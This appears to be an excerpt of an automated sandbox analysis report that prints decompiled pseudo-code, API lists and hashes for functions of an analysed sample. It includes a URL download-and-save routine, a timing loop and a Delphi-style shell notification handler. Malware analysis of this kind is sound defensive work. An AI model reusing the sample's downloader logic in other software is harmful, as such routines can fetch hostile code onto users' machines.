				void* _t70;
				void* _t72;
				void* _t73;
				intOrPtr _t74;

				_t72 = _t73;
				_t74 = _t73 + 0xfffff8c4;
				_v1856 = 0;
				_v28 = 0;
				_v32 = 0;
				_v36 = 0;
				_v8 = __edx;
				_t70 = __eax;
				_t57 =  &_v24;
				_push(_t72);
				_push(0x474f77);
				_push( *[fs:eax]);
				 *[fs:eax] = _t74;
				E00402B68(0,  &_v1856);
				E00409E18(_v1856,  &_v28);
				_v16 = InternetOpenA(E00404E80(_v28), 0, 0, 0, 0);
				_push(_t72);
				_push(0x474e92);
				_push( *[fs:eax]);
				 *[fs:eax] = _t74;
				_v20 = InternetOpenUrlA(_v16, E00404E80(_t70), 0, 0, 0x84000000, 0);
				_push(_t72);
				_push(0x474e74);
				_push( *[fs:eax]);
				 *[fs:eax] = _t74;
				E00402F1C( &_v1392, _v8, 0);
				E004028C4(E004035E4());
				do {
					InternetReadFile(_v20,  &_v1060, 0x400, _t57);
					E004028C4(E0040306C(0));
				} while ( *_t57 != 0);
				E004028C4(E0040308C( &_v1392));
				_v9 = 1;
				_pop(_t68);
				 *[fs:eax] = _t68;
				_push(0x474e7b);
				return InternetCloseHandle(_v20);
			}




















                                                                                                                                                                                                                            0x00474d51
                                                                                                                                                                                                                            0x00474d53
                                                                                                                                                                                                                            0x00474d5d
                                                                                                                                                                                                                            0x00474d63
                                                                                                                                                                                                                            0x00474d66
                                                                                                                                                                                                                            0x00474d69
                                                                                                                                                                                                                            0x00474d6c
                                                                                                                                                                                                                            0x00474d6f
                                                                                                                                                                                                                            0x00474d71
                                                                                                                                                                                                                            0x00474d76
                                                                                                                                                                                                                            0x00474d77
                                                                                                                                                                                                                            0x00474d7c
                                                                                                                                                                                                                            0x00474d7f
                                                                                                                                                                                                                            0x00474d8a
                                                                                                                                                                                                                            0x00474d98
                                                                                                                                                                                                                            0x00474db3
                                                                                                                                                                                                                            0x00474db8
                                                                                                                                                                                                                            0x00474db9
                                                                                                                                                                                                                            0x00474dbe
                                                                                                                                                                                                                            0x00474dc1
                                                                                                                                                                                                                            0x00474de0
                                                                                                                                                                                                                            0x00474de5
                                                                                                                                                                                                                            0x00474de6
                                                                                                                                                                                                                            0x00474deb
                                                                                                                                                                                                                            0x00474dee
                                                                                                                                                                                                                            0x00474dfa
                                                                                                                                                                                                                            0x00474e0f
                                                                                                                                                                                                                            0x00474e14
                                                                                                                                                                                                                            0x00474e25
                                                                                                                                                                                                                            0x00474e3f
                                                                                                                                                                                                                            0x00474e44
                                                                                                                                                                                                                            0x00474e54
                                                                                                                                                                                                                            0x00474e59
                                                                                                                                                                                                                            0x00474e5f
                                                                                                                                                                                                                            0x00474e62
                                                                                                                                                                                                                            0x00474e65
                                                                                                                                                                                                                            0x00474e73

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00402B68: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,?,00000000,00474795,004747D4,?,00000000,004747BE,?,?,?,?,00000000), ref: 00402B8C
                                                                                                                                                                                                                            • InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00474DAE
                                                                                                                                                                                                                            • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,84000000,00000000), ref: 00474DDB
                                                                                                                                                                                                                            • InternetReadFile.WININET(?,?,00000400,?), ref: 00474E25
                                                                                                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 00474E6E
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Internet$FileOpen$CloseHandleModuleNameRead
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1785656124-0
                                                                                                                                                                                                                            • Opcode ID: 258ed6f4a337dd00b29ed6c0571024dd33be25b5071fc36f155e22a10198ec8f
                                                                                                                                                                                                                            • Instruction ID: 9dd8df19d1045a063bc6dcad90270211b168fb7c8f28217f7d4554014ce166d6
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 258ed6f4a337dd00b29ed6c0571024dd33be25b5071fc36f155e22a10198ec8f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8D318670A00218ABDB11DFA5DC52BAEB7B8EB48704F91447AF504B72C1D7786A00CF68
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00435BD4 Relevance: 6.0, APIs: 4, Instructions: 46sleepCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 58%
                                                                                                                                                                                                                            			E00435BD4(void* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v8;
				CHAR* _t20;
				long _t25;
				intOrPtr _t30;
				void* _t34;
				intOrPtr _t37;

				_push(0);
				_t34 = __eax;
				_push(_t37);
				_push(0x435c51);
				_push( *[fs:eax]);
				 *[fs:eax] = _t37;
				E00435634(__eax);
				_t25 = GetTickCount();
				do {
					Sleep(0);
				} while (GetTickCount() - _t25 <= 0x3e8);
				E00435234(_t34, _t25,  &_v8, 0, __edi, _t34);
				if(_v8 != 0) {
					_t20 = E00404E80(_v8);
					WinHelpA( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t34 + 0x1c)))) + 0xc))(), _t20, 9, 0);
				}
				_pop(_t30);
				 *[fs:eax] = _t30;
				_push(0x435c58);
				return E004049C0( &_v8);
			}









                                                                                                                                                                                                                            0x00435bd7
                                                                                                                                                                                                                            0x00435bdb
                                                                                                                                                                                                                            0x00435bdf
                                                                                                                                                                                                                            0x00435be0
                                                                                                                                                                                                                            0x00435be5
                                                                                                                                                                                                                            0x00435be8
                                                                                                                                                                                                                            0x00435bed
                                                                                                                                                                                                                            0x00435bf7
                                                                                                                                                                                                                            0x00435bf9
                                                                                                                                                                                                                            0x00435bfb
                                                                                                                                                                                                                            0x00435c07
                                                                                                                                                                                                                            0x00435c15
                                                                                                                                                                                                                            0x00435c1e
                                                                                                                                                                                                                            0x00435c27
                                                                                                                                                                                                                            0x00435c36
                                                                                                                                                                                                                            0x00435c36
                                                                                                                                                                                                                            0x00435c3d
                                                                                                                                                                                                                            0x00435c40
                                                                                                                                                                                                                            0x00435c43
                                                                                                                                                                                                                            0x00435c50

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00435634: WinHelpA.USER32 ref: 00435643
                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00435BF2
                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000,00000000,00435C51,?,?,00000000,00000000,?,00435BCA), ref: 00435BFB
                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00435C00
                                                                                                                                                                                                                            • WinHelpA.USER32 ref: 00435C36
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CountHelpTick$Sleep
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2438605093-0
                                                                                                                                                                                                                            • Opcode ID: cdb3f0a47abc97e9ab8d290f2c7d69f339f0985d3f4200dd5a8a68ef50c0141f
                                                                                                                                                                                                                            • Instruction ID: 40ece7025a35593bf5630c28b5397b8871db868c6d8e528fc1fd908e9dcdadfb
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cdb3f0a47abc97e9ab8d290f2c7d69f339f0985d3f4200dd5a8a68ef50c0141f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8701A270A04604AFE711EBAACC53B1EB3A8DB4C708F6155BBF500A62C1DA7CAD01855A
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0045E9EC Relevance: 4.9, APIs: 3, Instructions: 353nativeCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 85%
                                                                                                                                                                                                                            			E0045E9EC(void* __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi, void* __fp0) {
				signed int _v8;
				char _v9;
				char _v16;
				char _v20;
				char _v276;
				char _v280;
				intOrPtr _t154;
				signed int _t160;
				int _t163;
				int _t168;
				signed int _t172;
				int _t173;
				int _t183;
				int _t188;
				int _t198;
				int _t202;
				int _t206;
				void* _t217;
				void* _t221;
				void* _t225;
				void* _t257;
				intOrPtr _t278;
				intOrPtr _t306;
				struct _ITEMIDLIST** _t307;
				intOrPtr* _t309;
				void* _t312;
				void* _t318;
				void* _t319;
				void* _t320;

				_v280 = 0;
				_v16 = 0;
				_v20 = 0;
				_t309 = __edx;
				_t257 = __eax;
				_push(_t312);
				_push(0x45ef62);
				_push( *[fs:eax]);
				 *[fs:eax] = _t312 + 0xfffffee0;
				_t306 =  *__edx;
				if(_t306 !=  *((intOrPtr*)(__eax + 0xd2))) {
					_push( *(__edx + 8));
					_push( *(__edx + 4));
					_push(_t306);
					_t154 =  *((intOrPtr*)(__eax + 0xda));
					_push(_t154);
					L00407540();
					 *((intOrPtr*)(__edx + 0xc)) = _t154;
					goto L80;
				} else {
					_t160 =  *(__edx + 8);
					_v8 = _t160 & 0x7fffffff;
					_v9 = (_t160 & 0x80000000) != 0;
					_t307 =  *(__edx + 4);
					if( *_t307 != 0) {
						__eflags = _v8 - 0x40000;
						if(_v8 != 0x40000) {
							_t163 = SHGetPathFromIDList( *_t307,  &_v276);
							__eflags = _t163;
							if(_t163 != 0) {
								E0040A174( &_v276,  &_v16);
							} else {
								E004049C0( &_v16);
							}
						} else {
							asm("fild dword [eax]");
							asm("fldln2");
							asm("fxch st0, st1");
							asm("fyl2x");
							[tword [ebp-0x120] = __fp0;
							asm("wait");
							asm("fldln2");
							asm("fxch st0, st1");
							asm("fyl2x");
							asm("fdivrp st1, st0");
							E00402C20();
							asm("adc edx, 0x0");
							E00404BA8();
							E00404CCC( &_v16, 0x45ef84, _v280);
						}
					} else {
						E004049C0( &_v16);
					}
					if(_t307[1] != 0) {
						_t168 = SHGetPathFromIDList(_t307[1],  &_v276);
						__eflags = _t168;
						if(_t168 != 0) {
							E0040A174( &_v276,  &_v20);
						} else {
							E004049C0( &_v20);
						}
					} else {
						E004049C0( &_v20);
					}
					_t318 =  *(_t257 + 0xde) - _v8;
					if(_t318 != 0) {
						L16:
						_t172 = _v8;
						_t319 = _t172 - 0x400;
						if(_t319 > 0) {
							__eflags = _t172 - 0x8000;
							if(__eflags > 0) {
								_t173 = _t172 - 0x10000;
								__eflags = _t173;
								if(_t173 == 0) {
									__eflags =  *((short*)(_t257 + 0x5c));
									if( *((short*)(_t257 + 0x5c)) != 0) {
										 *((intOrPtr*)(_t257 + 0x5a))(_v9);
									}
								} else {
									_t183 = _t173 - 0x10000;
									__eflags = _t183;
									if(_t183 == 0) {
										__eflags =  *((short*)(_t257 + 0x9c));
										if( *((short*)(_t257 + 0x9c)) != 0) {
											 *((intOrPtr*)(_t257 + 0x9a))(_v9, _v20);
										}
									} else {
										_t188 = _t183 - 0x20000;
										__eflags = _t188;
										if(_t188 == 0) {
											__eflags =  *((short*)(_t257 + 0x6c));
											if( *((short*)(_t257 + 0x6c)) != 0) {
												 *((intOrPtr*)(_t257 + 0x6a))(_v9);
											}
										} else {
											__eflags = _t188 == 0x7fc0000;
											if(_t188 == 0x7fc0000) {
												__eflags =  *((short*)(_t257 + 0x34));
												if( *((short*)(_t257 + 0x34)) != 0) {
													 *((intOrPtr*)(_t257 + 0x32))();
												}
											}
										}
									}
								}
							} else {
								if(__eflags == 0) {
									__eflags =  *((short*)(_t257 + 0xc4));
									if( *((short*)(_t257 + 0xc4)) != 0) {
										 *((intOrPtr*)(_t257 + 0xc2))(_v9);
									}
								} else {
									_t198 = _t172 - 0x800;
									__eflags = _t198;
									if(_t198 == 0) {
										__eflags =  *((short*)(_t257 + 0x3c));
										if( *((short*)(_t257 + 0x3c)) != 0) {
											 *((intOrPtr*)(_t257 + 0x3a))(_v9);
										}
									} else {
										_t202 = _t198 - 0x800;
										__eflags = _t202;
										if(_t202 == 0) {
											__eflags =  *((short*)(_t257 + 0xbc));
											if( *((short*)(_t257 + 0xbc)) != 0) {
												 *((intOrPtr*)(_t257 + 0xba))(_v9);
											}
										} else {
											_t206 = _t202 - 0x1000;
											__eflags = _t206;
											if(_t206 == 0) {
												__eflags =  *((short*)(_t257 + 0xcc));
												if( *((short*)(_t257 + 0xcc)) != 0) {
													 *((intOrPtr*)(_t257 + 0xca))(_v9);
												}
											} else {
												__eflags = _t206 == 0x2000;
												if(_t206 == 0x2000) {
													__eflags =  *((short*)(_t257 + 0xb4));
													if( *((short*)(_t257 + 0xb4)) != 0) {
														 *((intOrPtr*)(_t257 + 0xb2))(_v9);
													}
												}
											}
										}
									}
								}
							}
							goto L78;
						}
						if(_t319 == 0) {
							__eflags =  *((short*)(_t257 + 0x94));
							if( *((short*)(_t257 + 0x94)) != 0) {
								 *((intOrPtr*)(_t257 + 0x92))(_v9);
							}
							goto L78;
						}
						_t320 = _t172 - 0x20;
						if(_t320 > 0) {
							_t217 = _t172 - 0x40;
							if(_t217 == 0) {
								__eflags =  *((short*)(_t257 + 0x7c));
								if( *((short*)(_t257 + 0x7c)) != 0) {
									 *((intOrPtr*)(_t257 + 0x7a))(_v9);
								}
							} else {
								_t221 = _t217 - 0x40;
								if(_t221 == 0) {
									__eflags =  *((short*)(_t257 + 0x64));
									if( *((short*)(_t257 + 0x64)) != 0) {
										 *((intOrPtr*)(_t257 + 0x62))(_v9);
									}
								} else {
									_t225 = _t221 - 0x80;
									if(_t225 == 0) {
										__eflags =  *((short*)(_t257 + 0x54));
										if( *((short*)(_t257 + 0x54)) != 0) {
											 *((intOrPtr*)(_t257 + 0x52))(_v9);
										}
									} else {
										if(_t225 == 0x100) {
											__eflags =  *((short*)(_t257 + 0x8c));
											if( *((short*)(_t257 + 0x8c)) != 0) {
												 *((intOrPtr*)(_t257 + 0x8a))(_v9);
											}
										}
									}
								}
							}
							goto L78;
						}
						if(_t320 == 0) {
							__eflags =  *((short*)(_t257 + 0x74));
							if( *((short*)(_t257 + 0x74)) != 0) {
								 *((intOrPtr*)(_t257 + 0x72))(_v9);
							}
							goto L78;
						}
						if(_t172 > 0x10) {
							goto L78;
						}
						switch( *((intOrPtr*)(_t172 * 4 +  &M0045EB75))) {
							case 0:
								goto L78;
							case 1:
								__eflags =  *((short*)(__ebx + 0xa4));
								if( *((short*)(__ebx + 0xa4)) != 0) {
									__eax = _v20;
									_push(__eax);
									_push(__eax);
									__ecx = _v16;
									__edx = __ebx;
									__eax =  *((intOrPtr*)(__ebx + 0xa6));
									__eax =  *((intOrPtr*)(__ebx + 0xa2))();
								}
								goto L78;
							case 2:
								__eflags =  *((short*)(__ebx + 0x44));
								if( *((short*)(__ebx + 0x44)) != 0) {
									_push(__eax);
									__ecx = _v16;
									__edx = __ebx;
									__eax =  *((intOrPtr*)(__ebx + 0x46));
									__eax =  *((intOrPtr*)(__ebx + 0x42))();
								}
								goto L78;
							case 3:
								__eflags =  *((short*)(__ebx + 0x4c));
								if( *((short*)(__ebx + 0x4c)) != 0) {
									_push(__eax);
									__ecx = _v16;
									__edx = __ebx;
									__eax =  *((intOrPtr*)(__ebx + 0x4e));
									__eax =  *((intOrPtr*)(__ebx + 0x4a))();
								}
								goto L78;
							case 4:
								__eflags =  *((short*)(__ebx + 0x84));
								if( *((short*)(__ebx + 0x84)) != 0) {
									_push(__eax);
									__ecx = _v16;
									__edx = __ebx;
									__eax =  *((intOrPtr*)(__ebx + 0x86));
									__eax =  *((intOrPtr*)(__ebx + 0x82))();
								}
								goto L78;
							case 5:
								__eflags =  *((short*)(__ebx + 0xac));
								if( *((short*)(__ebx + 0xac)) != 0) {
									_push(__eax);
									__ecx = _v16;
									__edx = __ebx;
									__eax =  *((intOrPtr*)(__ebx + 0xae));
									__eax =  *((intOrPtr*)(__ebx + 0xaa))();
								}
								goto L78;
						}
					} else {
						E00404DCC( *((intOrPtr*)(_t257 + 0xe2)), _v16);
						if(_t318 != 0) {
							goto L16;
						}
						E00404DCC( *((intOrPtr*)(_t257 + 0xe6)), _v20);
						if(_t318 == 0) {
							L78:
							 *(_t257 + 0xde) = _v8;
							E00404A14(_t257 + 0xe2, _v16);
							E00404A14(_t257 + 0xe6, _v20);
							 *((intOrPtr*)(_t309 + 0xc)) = 0;
							L80:
							_pop(_t278);
							 *[fs:eax] = _t278;
							_push(0x45ef69);
							E004049C0( &_v280);
							return E004049E4( &_v20, 2);
						}
						goto L16;
					}
				}
			}
































                                                                                                                                                                                                                            0x0045e9fa
                                                                                                                                                                                                                            0x0045ea00
                                                                                                                                                                                                                            0x0045ea03
                                                                                                                                                                                                                            0x0045ea06
                                                                                                                                                                                                                            0x0045ea08
                                                                                                                                                                                                                            0x0045ea0c
                                                                                                                                                                                                                            0x0045ea0d
                                                                                                                                                                                                                            0x0045ea12
                                                                                                                                                                                                                            0x0045ea15
                                                                                                                                                                                                                            0x0045ea18
                                                                                                                                                                                                                            0x0045ea20
                                                                                                                                                                                                                            0x0045ef27
                                                                                                                                                                                                                            0x0045ef2b
                                                                                                                                                                                                                            0x0045ef2c
                                                                                                                                                                                                                            0x0045ef2d
                                                                                                                                                                                                                            0x0045ef33
                                                                                                                                                                                                                            0x0045ef34
                                                                                                                                                                                                                            0x0045ef39
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045ea26
                                                                                                                                                                                                                            0x0045ea26
                                                                                                                                                                                                                            0x0045ea31
                                                                                                                                                                                                                            0x0045ea39
                                                                                                                                                                                                                            0x0045ea3d
                                                                                                                                                                                                                            0x0045ea43
                                                                                                                                                                                                                            0x0045ea52
                                                                                                                                                                                                                            0x0045ea59
                                                                                                                                                                                                                            0x0045eaba
                                                                                                                                                                                                                            0x0045eabf
                                                                                                                                                                                                                            0x0045eac1
                                                                                                                                                                                                                            0x0045ead6
                                                                                                                                                                                                                            0x0045eac3
                                                                                                                                                                                                                            0x0045eac6
                                                                                                                                                                                                                            0x0045eac6
                                                                                                                                                                                                                            0x0045ea5b
                                                                                                                                                                                                                            0x0045ea60
                                                                                                                                                                                                                            0x0045ea62
                                                                                                                                                                                                                            0x0045ea64
                                                                                                                                                                                                                            0x0045ea66
                                                                                                                                                                                                                            0x0045ea68
                                                                                                                                                                                                                            0x0045ea6e
                                                                                                                                                                                                                            0x0045ea75
                                                                                                                                                                                                                            0x0045ea77
                                                                                                                                                                                                                            0x0045ea79
                                                                                                                                                                                                                            0x0045ea81
                                                                                                                                                                                                                            0x0045ea83
                                                                                                                                                                                                                            0x0045ea8b
                                                                                                                                                                                                                            0x0045ea96
                                                                                                                                                                                                                            0x0045eaa9
                                                                                                                                                                                                                            0x0045eaa9
                                                                                                                                                                                                                            0x0045ea45
                                                                                                                                                                                                                            0x0045ea48
                                                                                                                                                                                                                            0x0045ea48
                                                                                                                                                                                                                            0x0045eadf
                                                                                                                                                                                                                            0x0045eaf6
                                                                                                                                                                                                                            0x0045eafb
                                                                                                                                                                                                                            0x0045eafd
                                                                                                                                                                                                                            0x0045eb12
                                                                                                                                                                                                                            0x0045eaff
                                                                                                                                                                                                                            0x0045eb02
                                                                                                                                                                                                                            0x0045eb02
                                                                                                                                                                                                                            0x0045eae1
                                                                                                                                                                                                                            0x0045eae4
                                                                                                                                                                                                                            0x0045eae4
                                                                                                                                                                                                                            0x0045eb1d
                                                                                                                                                                                                                            0x0045eb20
                                                                                                                                                                                                                            0x0045eb46
                                                                                                                                                                                                                            0x0045eb46
                                                                                                                                                                                                                            0x0045eb49
                                                                                                                                                                                                                            0x0045eb4e
                                                                                                                                                                                                                            0x0045ebe6
                                                                                                                                                                                                                            0x0045ebeb
                                                                                                                                                                                                                            0x0045ec20
                                                                                                                                                                                                                            0x0045ec20
                                                                                                                                                                                                                            0x0045ec25
                                                                                                                                                                                                                            0x0045ece3
                                                                                                                                                                                                                            0x0045ece8
                                                                                                                                                                                                                            0x0045ecfa
                                                                                                                                                                                                                            0x0045ecfa
                                                                                                                                                                                                                            0x0045ec2b
                                                                                                                                                                                                                            0x0045ec2b
                                                                                                                                                                                                                            0x0045ec2b
                                                                                                                                                                                                                            0x0045ec30
                                                                                                                                                                                                                            0x0045edf6
                                                                                                                                                                                                                            0x0045edfe
                                                                                                                                                                                                                            0x0045ee17
                                                                                                                                                                                                                            0x0045ee17
                                                                                                                                                                                                                            0x0045ec36
                                                                                                                                                                                                                            0x0045ec36
                                                                                                                                                                                                                            0x0045ec36
                                                                                                                                                                                                                            0x0045ec3b
                                                                                                                                                                                                                            0x0045ed21
                                                                                                                                                                                                                            0x0045ed26
                                                                                                                                                                                                                            0x0045ed38
                                                                                                                                                                                                                            0x0045ed38
                                                                                                                                                                                                                            0x0045ec41
                                                                                                                                                                                                                            0x0045ec41
                                                                                                                                                                                                                            0x0045ec46
                                                                                                                                                                                                                            0x0045ec4c
                                                                                                                                                                                                                            0x0045ec51
                                                                                                                                                                                                                            0x0045ec5f
                                                                                                                                                                                                                            0x0045ec5f
                                                                                                                                                                                                                            0x0045ec51
                                                                                                                                                                                                                            0x0045ec46
                                                                                                                                                                                                                            0x0045ec3b
                                                                                                                                                                                                                            0x0045ec30
                                                                                                                                                                                                                            0x0045ebed
                                                                                                                                                                                                                            0x0045ebed
                                                                                                                                                                                                                            0x0045eeb8
                                                                                                                                                                                                                            0x0045eec0
                                                                                                                                                                                                                            0x0045eed1
                                                                                                                                                                                                                            0x0045eed1
                                                                                                                                                                                                                            0x0045ebf3
                                                                                                                                                                                                                            0x0045ebf3
                                                                                                                                                                                                                            0x0045ebf3
                                                                                                                                                                                                                            0x0045ebf8
                                                                                                                                                                                                                            0x0045ec67
                                                                                                                                                                                                                            0x0045ec6c
                                                                                                                                                                                                                            0x0045ec7e
                                                                                                                                                                                                                            0x0045ec7e
                                                                                                                                                                                                                            0x0045ebfa
                                                                                                                                                                                                                            0x0045ebfa
                                                                                                                                                                                                                            0x0045ebfa
                                                                                                                                                                                                                            0x0045ebff
                                                                                                                                                                                                                            0x0045ee97
                                                                                                                                                                                                                            0x0045ee9f
                                                                                                                                                                                                                            0x0045eeb0
                                                                                                                                                                                                                            0x0045eeb0
                                                                                                                                                                                                                            0x0045ec05
                                                                                                                                                                                                                            0x0045ec05
                                                                                                                                                                                                                            0x0045ec05
                                                                                                                                                                                                                            0x0045ec0a
                                                                                                                                                                                                                            0x0045eed9
                                                                                                                                                                                                                            0x0045eee1
                                                                                                                                                                                                                            0x0045eef2
                                                                                                                                                                                                                            0x0045eef2
                                                                                                                                                                                                                            0x0045ec10
                                                                                                                                                                                                                            0x0045ec10
                                                                                                                                                                                                                            0x0045ec15
                                                                                                                                                                                                                            0x0045ee76
                                                                                                                                                                                                                            0x0045ee7e
                                                                                                                                                                                                                            0x0045ee8f
                                                                                                                                                                                                                            0x0045ee8f
                                                                                                                                                                                                                            0x0045ee7e
                                                                                                                                                                                                                            0x0045ec15
                                                                                                                                                                                                                            0x0045ec0a
                                                                                                                                                                                                                            0x0045ebff
                                                                                                                                                                                                                            0x0045ebf8
                                                                                                                                                                                                                            0x0045ebed
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045ebeb
                                                                                                                                                                                                                            0x0045eb54
                                                                                                                                                                                                                            0x0045edce
                                                                                                                                                                                                                            0x0045edd6
                                                                                                                                                                                                                            0x0045edeb
                                                                                                                                                                                                                            0x0045edeb
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045edd6
                                                                                                                                                                                                                            0x0045eb5a
                                                                                                                                                                                                                            0x0045eb5d
                                                                                                                                                                                                                            0x0045ebb9
                                                                                                                                                                                                                            0x0045ebbc
                                                                                                                                                                                                                            0x0045ed5f
                                                                                                                                                                                                                            0x0045ed64
                                                                                                                                                                                                                            0x0045ed76
                                                                                                                                                                                                                            0x0045ed76
                                                                                                                                                                                                                            0x0045ebc2
                                                                                                                                                                                                                            0x0045ebc2
                                                                                                                                                                                                                            0x0045ebc5
                                                                                                                                                                                                                            0x0045ed02
                                                                                                                                                                                                                            0x0045ed07
                                                                                                                                                                                                                            0x0045ed19
                                                                                                                                                                                                                            0x0045ed19
                                                                                                                                                                                                                            0x0045ebcb
                                                                                                                                                                                                                            0x0045ebcb
                                                                                                                                                                                                                            0x0045ebd0
                                                                                                                                                                                                                            0x0045ecc4
                                                                                                                                                                                                                            0x0045ecc9
                                                                                                                                                                                                                            0x0045ecdb
                                                                                                                                                                                                                            0x0045ecdb
                                                                                                                                                                                                                            0x0045ebd6
                                                                                                                                                                                                                            0x0045ebdb
                                                                                                                                                                                                                            0x0045eda6
                                                                                                                                                                                                                            0x0045edae
                                                                                                                                                                                                                            0x0045edc3
                                                                                                                                                                                                                            0x0045edc3
                                                                                                                                                                                                                            0x0045edae
                                                                                                                                                                                                                            0x0045ebdb
                                                                                                                                                                                                                            0x0045ebd0
                                                                                                                                                                                                                            0x0045ebc5
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045ebbc
                                                                                                                                                                                                                            0x0045eb5f
                                                                                                                                                                                                                            0x0045ed40
                                                                                                                                                                                                                            0x0045ed45
                                                                                                                                                                                                                            0x0045ed57
                                                                                                                                                                                                                            0x0045ed57
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045ed45
                                                                                                                                                                                                                            0x0045eb68
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045eb6e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045ee22
                                                                                                                                                                                                                            0x0045ee2a
                                                                                                                                                                                                                            0x0045ee30
                                                                                                                                                                                                                            0x0045ee33
                                                                                                                                                                                                                            0x0045ee37
                                                                                                                                                                                                                            0x0045ee38
                                                                                                                                                                                                                            0x0045ee3b
                                                                                                                                                                                                                            0x0045ee3d
                                                                                                                                                                                                                            0x0045ee43
                                                                                                                                                                                                                            0x0045ee43
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045ec86
                                                                                                                                                                                                                            0x0045ec8b
                                                                                                                                                                                                                            0x0045ec94
                                                                                                                                                                                                                            0x0045ec95
                                                                                                                                                                                                                            0x0045ec98
                                                                                                                                                                                                                            0x0045ec9a
                                                                                                                                                                                                                            0x0045ec9d
                                                                                                                                                                                                                            0x0045ec9d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045eca5
                                                                                                                                                                                                                            0x0045ecaa
                                                                                                                                                                                                                            0x0045ecb3
                                                                                                                                                                                                                            0x0045ecb4
                                                                                                                                                                                                                            0x0045ecb7
                                                                                                                                                                                                                            0x0045ecb9
                                                                                                                                                                                                                            0x0045ecbc
                                                                                                                                                                                                                            0x0045ecbc
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045ed7e
                                                                                                                                                                                                                            0x0045ed86
                                                                                                                                                                                                                            0x0045ed8f
                                                                                                                                                                                                                            0x0045ed90
                                                                                                                                                                                                                            0x0045ed93
                                                                                                                                                                                                                            0x0045ed95
                                                                                                                                                                                                                            0x0045ed9b
                                                                                                                                                                                                                            0x0045ed9b
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045ee4e
                                                                                                                                                                                                                            0x0045ee56
                                                                                                                                                                                                                            0x0045ee5f
                                                                                                                                                                                                                            0x0045ee60
                                                                                                                                                                                                                            0x0045ee63
                                                                                                                                                                                                                            0x0045ee65
                                                                                                                                                                                                                            0x0045ee6b
                                                                                                                                                                                                                            0x0045ee6b
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045eb22
                                                                                                                                                                                                                            0x0045eb2b
                                                                                                                                                                                                                            0x0045eb30
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045eb3b
                                                                                                                                                                                                                            0x0045eb40
                                                                                                                                                                                                                            0x0045eef8
                                                                                                                                                                                                                            0x0045eefb
